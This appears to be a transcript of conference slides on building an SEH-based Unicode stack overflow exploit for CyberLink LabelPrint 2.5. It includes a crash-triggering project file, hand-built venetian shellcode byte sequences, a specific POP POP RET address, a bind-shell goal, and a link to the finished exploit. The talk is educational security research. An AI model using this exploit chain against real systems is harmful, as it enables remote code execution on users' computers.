cyberlink labelprint 2.5 exploitation process
TRANSCRIPT
Exploit
DevelopmentCyberlink LabelPrint 2.5 Unicode Stack Overflow
IT Audit & IT Security Meetup #4 - Sharing in the Cloud
Indonesian Cloud, Jakarta, 13 October 2017
Who?
Thomas Gregory - @modpr0be
IT Security consultant @Spentera
Security researcher (occasionally)
focus on Windows exploitation
IT Security trainer (sometimes)
f3ci - ????
Security researcher
Penetration tester, red team
Appsec & simple exploit dev
What?
CyberLink LabelPrint 2.5
Labeling software
Embedded by default in CyberLink Power2Go
installation.
Included as bloatware in all Lenovo, HP, Asus
laptops somewhere between 2015-2016.
Why?
The exploit development is quite challenging and
interesting
We want to share it for education purposes only.
Let’s BeginTHE FUZZ
Fuzzing possibility
File Input
import
open media
open project
Registry overflow
Tools
Immunity Debugger
with mona plugin
Editor/IDE
/me using sublime text
LabelPrint Project
Project file with extension .lpp
Header
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017"
SystemTime="24/07/2017">
<TRACK name=“” />
The Bug
In the name parameter, inside the TRACK tag
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK
name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA” />
</INFORMATION>
</PROJECT>
SEH Overwritten
Overwritten SE Handler
Unicode Based
AA or 4141 will be .A.A or 00410041
What is SEH?
a piece of code that is written inside an
application, with the purpose of dealing with the
fact that the application throws an exception
(taken from corelan)
an exception is an event, which occurs during the
execution of a program, that disrupts the normal
flow of the program's instructions.
a catcher, who is trying to catch unusual
behavior.
What is SEH?
This structure ( also called a SEH record) is 8 bytes
and has 2 (4 bytes) elements :
a pointer to the next exception registration
structure (in essence, to the next SEH record, in
case the current handler is unable the handle the
exception)
a pointer, the address of the actual code of the
exception handler. (SE Handler)
Abusing SEH
In other words, the payload must do the following things:
Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won’t kick in.
Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)
Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.
The shellcode should be directly after the overwritten SE Handler. Some small jumpcodecontained in the overwritten “pointer to next SEH record” will jump to it).
Abusing SEH
When the exception occurred, the position on the
stack will going like this:
Possible value to overwrite SE Handler are POP
something, POP something and RETN to the stack.
It will POP address that sit at the top of the stack,
POP it again to take the second address, and RETN
to execute the third address (which is now at the
top of the stack)
The third address usually our supplied input buffer
Top of stack
Our pointer to next SEH
address
Abusing SEH
Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
Unicode?
Unicode allows us to visually represent and/or
manipulate text in most of the systems across the
world in a consistent manner.
Unicode based exploit usually involved in
file/folder naming
part of input parameter that will deal with naming
More Info
Structured Exception Handler (SEH)
https://msdn.microsoft.com/en-
us/library/windows/desktop/ms680657(v=vs.85).aspx
https://www.corelan.be/index.php/2009/07/25/writi
ng-buffer-overflow-exploits-a-quick-and-basic-
tutorial-part-3-seh/
https://blog.spentera.com/2011/09/14/seh-based-
stack-overflow-the-basic/
Unicode based exploit
https://www.corelan.be/index.php/2009/11/06/expl
oit-writing-tutorial-part-7-unicode-from-0x00410041-
to-calc/
SEH + Unicode = Venetian PROBABLY THE MOST HATED COMBINATION
Venetian Shellcode
One of the registers must point at the beginning ofthe shellcode.
One register must point at a memory location that iswriteable (and where it’s ok to write the newreassembled shellcode)
Normal venetian prepend shellcode
Push another register to stack (ESP)
Pop stack (ESP) into EAX
Align the EAX register with add/sub instruction
Push EAX register into stack (ESP)
RET (return to the beginning of shellcode at EAX)
Sadly, we won’t face a normal venetian approach
Typical Venetian Unicode
Prepend Opcode
Align EAX Register
•If we use EAX as BufferRegister, we need to align EAX to point to our Buffer
“Stack Walking”
•Walk over the Next SEH and SEH.
RET to Shellcode
• Shellcode executed
Typical Venetian Unicode
Prepend Opcodeven = "\x56" #push esi
ven += "\x41" #align
ven += "\x58" #pop eax
ven += "\x41" #align
ven += "\x05\x04\x01" #add eax,01000400
ven += "\x41" #align
ven += "\x2d\x01\x01" #add eax,01000100
ven += "\x41" #align
ven += "\x50" #push eax
ven += "\x41" #align
ven += "\xc3" #ret
Depends on where
our buffer is.
Use EAX as a
BufferRegister
Problem?
Limited instruction (because of Unicode)
need to find POP POP RET with Unicode friendly
All hex value between 0x80 – 0xFF are marked as bad
Yes, RET opcode (C3) is also included in the bad
character list.
Meanwhile, our venetian shellcode need RET
Typical Venetian
Sh*t!
Solution
Find a proper Unicode friendly PPR (pop pop ret)
instructions address somewhere in the library or
executable
Create “our version” of RET
Fill the stack (ESP) with our shellcode
Pointing our RET to CALL ESP instruction address
This will alter the flow of execution.
EAX must be pointing to the beginning of our
shellcode.
“Stack walk” until we meet shellcode.
Our Venetian Unicode
Shellcode
Align EAX Register
Calculate where RET will
be placed
Construct RET in EAX
Calculate EAX for CALL ESP
Opcode
Reaching RET, Execute CALL
ESP
Re-aligning EAX
“Stack walk” to Shellcode
Bind shell 4444
pop pop ret
!mona seh
Fortunately, we found one address that is an
Unicode friendly (0x0044002c) in the main
program (LabelPrint.exe)
Construct RET (1)
Calculate the value of EAX register, preparing the
address where we exactly want the decoded RET
being placed later in the stack.
Limited calculation (because of UNICODE)
Zeroing the EAX register first
xor eax,eax
Construct RET (2)
Preparing address to push our RET:
push esp
pop eax
and EAX register with 01001B00 and EAX register with 01000100
push EAX
pop ESPven += "\x42" #nopven += "\x54" #push espven += "\x42" #nopven += "\x58" #pop eaxven += "\x42" #nopven += "\x05\x1B\x01" #add eax 01001B00ven += "\x42" #nopven += "\x2d\x01\x01" #sub eax 01001000ven += "\x42" #nopven += "\x50" #push eaxven += "\x42" #nopven += "\x5c" #pop esp
Construct RET (3)
After the calculation in EAX, now the stack (ESP) will be
pointing at 0x0012F655 (the same value as EAX)
This is important for our RET decoding address later.
Construct RET (4)
Zeroing Out EAX
We need to clear the EAX register for the next
calculation of the RET opcode.
After EAX is zeroed out we can calculate the EAX
register to meet 0xC300C300 (RET opcode).
We can perform the calculation with AND
operand :
AND EAX register with 7e007e00
AND EAX register with 01000100
Zeroing Out EAX
ven += "\x42" #nopven += "\x25\x7e\x7e" #and eax,7e007e00ven += "\x42" #nopven += "\x25\x01\x01" #and eax,01000100
Construct RET (5)
Preparing RET opcode:
Zeroing Out EAX first (done)
XOR EAX register with 7f007f00
ADD EAX register with 44004400
PUSH EDI
PUSH EAX
The RET Opcode (1)
ven += "\x35\x7f\x7f" #xor eax,7f007f00ven += "\x42" #nopven += "\x05\x44\x44" #add eax,44004400ven += "\x42" #nopven += "\x57" #push edi/paddingven += "\x42" #nopven += "\x50" #push eax
The RET Opcode (2)
Construct CALL to ESP (1)
Construct CALL to ESP (2)
Construct CALL to ESP (3)
Stack Walk to Shellcode
Our Venetian Shellcode
ven += "\x58" #pop eaxven += "\x42" #nopven += "\x58" #pop eaxven += "\x42" #nopven += "\x05\x10\x01" #add eax, 11001900, align eax to our bufferven += "\x42" #nopven += "\x2d\x0e\x01" #add eax, 11001800, align eax to our bufferven += "\x42" #nopven += "\x50" #push eaxven += "\x42" #nopven += "\x5C" #pop espven += "\x42" #nopven += "\x58" #pop eaxven += "\x42" #nopven += "\x05\x53\x7c" #add eax 7c005300 part of call espven += "\x42" #nopven += "\x50" #push eaxven += "\x42" * 68 #padding to fill the stackven += "\x7b\x32" #part of call esp
Final Exploithttps://www.exploit-db.com/exploits/42777/
Solution
For now, do not user CyberLink Label Print.
Thank [email protected]